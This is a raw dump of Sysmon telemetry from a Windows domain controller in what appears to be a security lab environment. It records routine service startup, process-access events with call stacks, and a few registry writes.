13:53:21.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.262{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.261{10ACEC4A-853E-5FCF-0A00-000000009101}8521128C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.254{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.253{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.253{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.246{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.245{10ACEC4A-853E-5FCF-0A00-000000009101}852944C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.213{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.245{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.245{10ACEC4A-853E-5FCF-0A00-000000009101}8522860C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.215{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe12.03System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=395EDC237F5BCD8DBA6F03289ED0AC58,SHA256=C22826DEAAF0B90359378807E37F6F984842EB41D6DDEFE09CCD243E54A24779,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 13241300x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:21.240{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:21.240{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.238{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.232{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.232{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.229{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.229{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.229{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.229{10ACEC4A-853E-5FCF-0A00-000000009101}8521280C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.227{10ACEC4A-853E-5FCF-0A00-000000009101}8521132C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.226{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.224{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.224{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.224{10ACEC4A-853E-5FCF-0A00-000000009101}852928C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.222{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.224{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.215{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT 